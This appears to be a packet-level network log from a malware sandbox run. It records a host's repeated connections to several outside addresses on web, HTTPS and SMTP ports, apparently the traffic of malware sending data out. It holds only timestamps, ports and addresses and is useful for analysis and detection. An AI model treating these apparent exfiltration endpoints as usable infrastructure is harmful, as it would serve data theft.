                                      Jul 25, 2024 03:34:44.822457075 CEST44349716188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:44.822563887 CEST44349716188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:44.822613955 CEST49716443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:44.823050022 CEST49716443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:44.827999115 CEST4971580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:44.829904079 CEST4971780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:44.834839106 CEST8049715158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:44.834909916 CEST4971580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:44.836348057 CEST8049717158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:44.836411953 CEST4971780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:44.836606026 CEST4971780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:44.843072891 CEST8049717158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:45.479860067 CEST8049717158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:45.481105089 CEST49718443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:45.481206894 CEST44349718188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:45.481307030 CEST49718443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:45.481591940 CEST49718443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:45.481643915 CEST44349718188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:45.529498100 CEST4971780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:45.991483927 CEST44349718188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:45.993325949 CEST49718443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:45.993392944 CEST44349718188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:46.149796963 CEST44349718188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:46.149892092 CEST44349718188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:46.149997950 CEST49718443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:46.150448084 CEST49718443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:46.153193951 CEST4971780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:46.154320955 CEST4971980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:46.158529997 CEST8049717158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:46.158611059 CEST4971780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:46.159277916 CEST8049719158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:46.159414053 CEST4971980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:46.159454107 CEST4971980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:46.164283037 CEST8049719158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:46.787453890 CEST8049719158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:46.788675070 CEST49720443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:46.788713932 CEST44349720188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:46.788794041 CEST49720443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:46.789057016 CEST49720443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:46.789064884 CEST44349720188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:46.841979027 CEST4971980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:47.275561094 CEST44349720188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:47.284931898 CEST49720443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:47.284951925 CEST44349720188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:47.409512997 CEST44349720188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:47.409826994 CEST44349720188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:47.409914970 CEST49720443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:47.414412975 CEST49720443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:47.486521959 CEST4971980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:47.492280960 CEST8049719158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:47.492399931 CEST4971980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:47.494827986 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:47.494869947 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:47.494931936 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:47.495394945 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:47.495407104 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:48.129789114 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:48.130043030 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:48.133126974 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:48.133133888 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:48.133429050 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:48.134857893 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:48.180500984 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:48.377054930 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:48.377217054 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:48.377286911 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:48.381295919 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:49.105386019 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:49.110558987 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:49.114392042 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:49.139708996 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:49.145998001 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:50.102118969 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:50.112905025 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:50.117710114 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:50.316365004 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:50.357572079 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:50.793932915 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:50.793981075 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:50.794049978 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:50.807050943 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:50.807080984 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:51.320550919 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:51.320631981 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:51.322236061 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:51.322268963 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:51.322573900 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:51.372153044 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:51.485009909 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:51.528515100 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:51.603324890 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:51.603403091 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:51.603457928 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:51.606511116 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:51.615945101 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:51.620852947 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:52.521858931 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:52.524322033 CEST49730443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:52.524358034 CEST44349730188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:52.524430990 CEST49730443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:52.524701118 CEST49730443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:52.524715900 CEST44349730188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:52.576337099 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:52.995065928 CEST44349730188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:53.003810883 CEST49730443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:53.003830910 CEST44349730188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:53.127058983 CEST44349730188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:53.127263069 CEST44349730188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:53.127329111 CEST49730443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:53.127659082 CEST49730443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:53.133786917 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:53.135143042 CEST4973280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:53.139234066 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:53.139337063 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:53.140136957 CEST8049732158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:53.140208960 CEST4973280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:53.140341043 CEST4973280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:53.145106077 CEST8049732158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:53.756190062 CEST8049732158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:53.757839918 CEST4973280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:53.758815050 CEST49733443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:53.758851051 CEST44349733188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:53.759176970 CEST49733443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:53.759432077 CEST49733443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:53.759443998 CEST44349733188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:53.763258934 CEST8049732158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:53.763331890 CEST4973280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:54.496959925 CEST4971380192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:55.211016893 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:55.215919018 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:55.216092110 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:56.707880020 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:56.710510015 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:56.715375900 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:57.057641029 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:57.059765100 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:57.064641953 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:57.406399965 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:57.406769037 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:57.411664009 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:57.776628017 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:57.778599977 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:57.783458948 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:58.125503063 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:58.125696898 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:58.130582094 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.240441084 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.240458012 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.240559101 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:59.240688086 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:59.246198893 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.589823961 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.590799093 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:59.590903044 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:59.590936899 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:59.590955019 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:59.595864058 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.595920086 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.596281052 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.596373081 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:59.596401930 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:03.240335941 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:35:03.244831085 CEST49735443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:03.244924068 CEST44349735149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:03.245043993 CEST49735443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:03.245331049 CEST49735443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:03.245363951 CEST44349735149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:03.295283079 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:35:03.927391052 CEST44349735149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:03.937735081 CEST49735443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:03.937769890 CEST44349735149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:03.937865973 CEST49735443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:03.937874079 CEST44349735149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:04.519695044 CEST44349735149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:04.519778967 CEST44349735149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:35:04.519876003 CEST49735443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:35:04.520241976 CEST49734587192.168.2.5118.69.190.131
Jul 25, 2024 03:35:04.520389080 CEST | 49735 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:04.525218964 CEST | 587 | 49734 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:04.867557049 CEST | 587 | 49734 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:04.867760897 CEST | 49734 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:04.867794037 CEST | 587 | 49734 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:04.867841959 CEST | 49734 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:04.872558117 CEST | 587 | 49734 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:24.250859022 CEST | 443 | 49733 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:24.250891924 CEST | 443 | 49733 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:24.251019955 CEST | 49733 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:24.251040936 CEST | 443 | 49733 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:24.256779909 CEST | 49733 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:24.256787062 CEST | 443 | 49733 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:24.356255054 CEST | 443 | 49733 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:24.364514112 CEST | 49733 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:24.364542961 CEST | 443 | 49733 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:24.475872040 CEST | 443 | 49733 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:24.487140894 CEST | 49736 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:24.492944002 CEST | 80 | 49736 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:24.493087053 CEST | 49736 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:24.493671894 CEST | 49736 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:24.499526978 CEST | 80 | 49736 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:24.530335903 CEST | 49733 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:25.104382038 CEST | 80 | 49736 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:25.105099916 CEST | 49733 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:25.105221987 CEST | 443 | 49733 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:25.106060028 CEST | 49737 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:25.106091976 CEST | 443 | 49737 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:25.106122971 CEST | 49733 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:25.106329918 CEST | 49737 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:25.106405020 CEST | 49737 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:25.106410027 CEST | 443 | 49737 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:25.155286074 CEST | 49736 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:25.596724987 CEST | 443 | 49737 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:25.596873999 CEST | 49737 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:25.599054098 CEST | 49737 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:25.599073887 CEST | 443 | 49737 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:25.600039959 CEST | 443 | 49737 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:25.606270075 CEST | 49737 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:25.648508072 CEST | 443 | 49737 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:25.760776043 CEST | 443 | 49737 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:25.760870934 CEST | 443 | 49737 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:25.761001110 CEST | 49737 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:25.761452913 CEST | 49737 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:25.767435074 CEST | 49736 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:25.768023014 CEST | 49738 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:25.772840977 CEST | 80 | 49736 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:25.772892952 CEST | 49736 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:25.772927046 CEST | 80 | 49738 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:25.773022890 CEST | 49738 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:25.773118019 CEST | 49738 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:25.777856112 CEST | 80 | 49738 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:26.399452925 CEST | 80 | 49738 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:26.400783062 CEST | 49739 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:26.400824070 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:26.400895119 CEST | 49739 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:26.401189089 CEST | 49739 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:26.401222944 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:26.451406002 CEST | 49738 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:26.859608889 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:26.861788034 CEST | 49739 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:26.861828089 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:26.997195005 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:26.997303009 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:26.997394085 CEST | 49739 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:26.997975111 CEST | 49739 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:27.001935959 CEST | 49738 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:27.003359079 CEST | 49740 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:27.008410931 CEST | 80 | 49738 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:27.008524895 CEST | 49738 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:27.008575916 CEST | 80 | 49740 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:27.008685112 CEST | 49740 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:27.008814096 CEST | 49740 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:27.013765097 CEST | 80 | 49740 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:27.642046928 CEST | 80 | 49740 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:27.643580914 CEST | 49741 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:27.643637896 CEST | 443 | 49741 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:27.643718004 CEST | 49741 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:27.644006968 CEST | 49741 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:27.644016981 CEST | 443 | 49741 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:27.685903072 CEST | 49740 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:28.126871109 CEST | 443 | 49741 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:28.129061937 CEST | 49741 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:28.129090071 CEST | 443 | 49741 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:28.267448902 CEST | 443 | 49741 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:28.267669916 CEST | 443 | 49741 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:28.267786980 CEST | 49741 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:28.268419981 CEST | 49741 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:28.275763035 CEST | 49740 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:28.277167082 CEST | 49742 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:28.281043053 CEST | 80 | 49740 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:28.281141996 CEST | 49740 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:28.282227993 CEST | 80 | 49742 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:28.282313108 CEST | 49742 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:28.282684088 CEST | 49742 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:28.288002014 CEST | 80 | 49742 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:28.918694019 CEST | 80 | 49742 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:28.924405098 CEST | 49744 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:28.924520016 CEST | 443 | 49744 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:28.924686909 CEST | 49744 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:28.926105976 CEST | 49744 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:28.926143885 CEST | 443 | 49744 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:28.968130112 CEST | 49742 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:29.401108980 CEST | 443 | 49744 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:29.403095007 CEST | 49744 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:29.403177023 CEST | 443 | 49744 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:29.531785965 CEST | 443 | 49744 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:29.531877041 CEST | 443 | 49744 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:29.531944036 CEST | 49744 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:29.532538891 CEST | 49744 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:29.541583061 CEST | 49742 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:29.542212963 CEST | 49745 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:29.547451973 CEST | 80 | 49742 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:29.547513008 CEST | 49742 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:29.547579050 CEST | 80 | 49745 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:29.547672033 CEST | 49745 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:29.547746897 CEST | 49745 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:29.552947998 CEST | 80 | 49745 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:30.161107063 CEST | 80 | 49745 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:30.163773060 CEST | 49746 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:30.163809061 CEST | 443 | 49746 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:30.163912058 CEST | 49746 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:30.164186001 CEST | 49746 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:30.164197922 CEST | 443 | 49746 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:30.216973066 CEST | 49745 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:30.684653044 CEST | 443 | 49746 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:30.687179089 CEST | 49746 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:30.687216043 CEST | 443 | 49746 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:30.844477892 CEST | 443 | 49746 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:30.844738960 CEST | 443 | 49746 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:30.844854116 CEST | 49746 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:30.845453978 CEST | 49746 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:30.850368977 CEST | 49745 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:30.851353884 CEST | 49747 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:30.855598927 CEST | 80 | 49745 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:30.855664015 CEST | 49745 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:30.856373072 CEST | 80 | 49747 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:30.856518030 CEST | 49747 | 80 | 192.168.2.5 | 158.101.44.242
